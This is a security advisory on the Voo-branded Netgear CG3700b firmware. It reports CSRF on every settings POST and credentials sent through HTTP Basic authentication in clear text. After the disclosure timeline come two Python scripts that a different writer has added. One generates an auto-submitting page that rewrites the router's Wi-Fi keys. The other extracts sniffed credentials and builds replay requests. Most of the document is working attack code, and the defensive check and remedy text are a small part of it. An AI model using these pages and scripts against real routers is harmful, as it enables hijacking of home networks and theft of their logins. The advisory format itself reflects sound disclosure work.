Voo Branded Netgear CG3700b Firmware CSRF / Authentication

2016.04.28
Credit: dev
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

CVEs pending, screenshots and further examples available soon on my site.

Cross-Site Request Forgery (CSRF) on all form POSTs
---------------------------------------------------------------------------------

The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack against every configuration-setting POST request (/goform/<settingspage>). No anti-CSRF token is required, and the browser of a user who has already authenticated to the router will attach the cached Basic credentials to the forged request. By tricking such a user into following a specially crafted link, an attacker can modify any setting, including the WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file.

Example (auto-submitting this form from an attacker-controlled page changes the SSID and WPA key of both radios):

<form method="POST" name="form0" action="http://192.168.0.1/goform/index">
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value="0">
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value="20">
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value="0">
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value="20">
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value="1">
<input type="hidden" name="only_mode" value="0">
<input type="hidden" name="selected_ch_an" value="1">
</form>

Insufficient Authentication (OWASP-A2)
-----------------------------------------------------------

The same modem handles authentication via HTTP Basic authentication over the default (HTTP, non-SSL) connection. Basic authentication only base64-encodes the username and password, so anyone who can observe the traffic can trivially decode the credentials and authenticate to the router.

This only requires that the attacker be on the same network as the router and sniff the clear-text traffic.

Example:

POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

root@kali:~# cat voo.txt
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt
voo:PASSWORD

Disclosure Timeline
-----------------------------

22 Jan - discovered vulnerability, initially notified vendor
23 Jan - requested CVE
7 Mar - contacted vendor again, was notified that this will not be fixed at this time
20 April - attempted to contact MITRE again to receive a CVE
21 April - sent to Full Disclosure
23 April - additional information (tentatively) posted to http://www.doyler.net
26 April - resent to Full Disclosure due to some errors
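The form in the CSRF section above, as an added example (my own code, not the advisory author's and not the device firmware): a Python script that generates the auto-submitting attack page from the same /goform/index field names, next to a model of the server-side check the firmware lacks. The `csrf_check` function, its `csrf_token` form field and the `own_hosts` list are assumptions about how a fixed firmware could validate a POST; nothing about the router's real request handling is taken from the page.

```python
import html
from urllib.parse import urlparse

# Field names from the advisory's PoC form for /goform/index; the SSIDs and
# keys are the attacker's chosen values (constructed, as in the advisory).
WIFI_PARAMS = {
    "group_parametrage_wifi": "active",
    "reseau_wifi_name": "NEWSSID",
    "nom_select": "AUTO-PSK",
    "canal": "0",
    "mot_de_passe": "NEWWPAKEY",
    "NBandwidth": "20",
    "group_parametrage_wifi_an": "active",
    "reseau_wifi_name_an": "NEWSSID-5G",
    "nom_select_an": "AUTO-PSK",
    "canal_an": "0",
    "mot_de_passe_an": "NEWWPAKEY-5G",
    "NBandwidth_an": "20",
    "group_fon": "desactiver",
    "buttonApply": "1",
    "only_mode": "0",
    "selected_ch_an": "1",
}


def _esc(s):
    """HTML-escape an attribute value so attacker-chosen SSIDs cannot break the markup."""
    return html.escape(s, quote=True)


def build_csrf_page(action, params):
    """Return an HTML page that POSTs `params` to `action` as soon as it loads.

    A victim whose browser has cached the router's Basic credentials submits
    the form without any interaction; the router sees a fully authenticated
    request and applies the new Wi-Fi settings.
    """
    inputs = "\n".join(
        f'  <input type="hidden" name="{_esc(k)}" value="{_esc(v)}">'
        for k, v in params.items()
    )
    return (
        "<!DOCTYPE html>\n<html><body>\n"
        f'<form method="POST" name="form0" action="{_esc(action)}">\n'
        f"{inputs}\n</form>\n"
        "<script>document.forms.form0.submit();</script>\n"
        "</body></html>\n"
    )


def csrf_check(headers, form, session_token, own_hosts=("192.168.0.1",)):
    """Model of the check the firmware lacks (an assumption, not the device's code).

    Returns None if the POST may be applied, otherwise a string saying why it
    must be rejected. Two independent defences are applied: the request must
    originate from the router's own host, and it must carry the per-session
    token that a cross-site page cannot read. A request with neither Origin
    nor Referer is rejected (fail closed).
    """
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return "no Origin/Referer header"
    host = urlparse(source).hostname
    if host not in own_hosts:
        return f"cross-site request from {host}"
    if form.get("csrf_token") != session_token:
        return "missing or wrong csrf_token"
    return None


if __name__ == "__main__":
    print(build_csrf_page("http://192.168.0.1/goform/index", WIFI_PARAMS))
    # The forged POST carries a foreign Origin and no token: rejected twice over.
    print(csrf_check({"Origin": "http://attacker.example"}, WIFI_PARAMS, "s3cr3t"))
```

Hosting the generated page anywhere the victim's browser will load it is enough; no script on the router's origin is needed, which is exactly why an Origin/Referer check plus a per-session token closes the hole.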
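To show what an on-path attacker gets from the Basic-over-HTTP login in the Insufficient Authentication section, here is an added Python example (mine, not from the advisory or the vendor) that parses a captured request, recovers the username and password, and builds a replay request that authenticates with them. The capture is constructed from the request shown above with the body dropped and Content-Length set to 0; the function names are my own. It also covers the cases a real sniffer hits: no Authorization header, a non-Basic scheme, invalid base64, and a password containing a colon.

```python
import base64
import binascii

# Constructed capture modelled on the advisory's request (body omitted).
CAPTURED_REQUEST = (
    b"POST /goform/parametre_config HTTP/1.1\r\n"
    b"Host: 192.168.0.1\r\n"
    b"Connection: keep-alive\r\n"
    b"Content-Length: 0\r\n"
    b"Cache-Control: max-age=0\r\n"
    b"Authorization: Basic dm9vOlBBU1NXT1JE\r\n"
    b"\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request_line, {lower-case header: value})."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def basic_credentials(raw):
    """Return (user, password) from an HTTP Basic Authorization header.

    Returns None when the request has no Authorization header, uses another
    scheme (e.g. Digest), or the token is not valid base64. Per RFC 7617 the
    user-id cannot contain a colon, so the decoded string is split at the
    first colon only; a colon in the password is preserved.
    """
    _, headers = parse_request(raw)
    auth = headers.get("authorization")
    if not auth:
        return None
    scheme, _, token = auth.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, sep, password = decoded.partition(":")
    if not sep:
        return None
    return user, password


def build_replay(host, path, user, password):
    """Build a request that reuses the sniffed credentials: Basic auth has no
    nonce or binding to the original request, so the header replays verbatim."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Authorization: Basic {token}\r\n"
        f"\r\n"
    ).encode("latin-1")


if __name__ == "__main__":
    creds = basic_credentials(CAPTURED_REQUEST)
    print("recovered:", creds)
    if creds:
        print(build_replay("192.168.0.1", "/", *creds).decode())
```

The same parsing applies to anything a LAN capture yields (tcpdump, a mirror port, or a rogue access point); the only countermeasure is transporting the login over TLS or replacing Basic with a session scheme that does not ship the reusable secret on every request.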
Copyright 2024, cxsecurity.com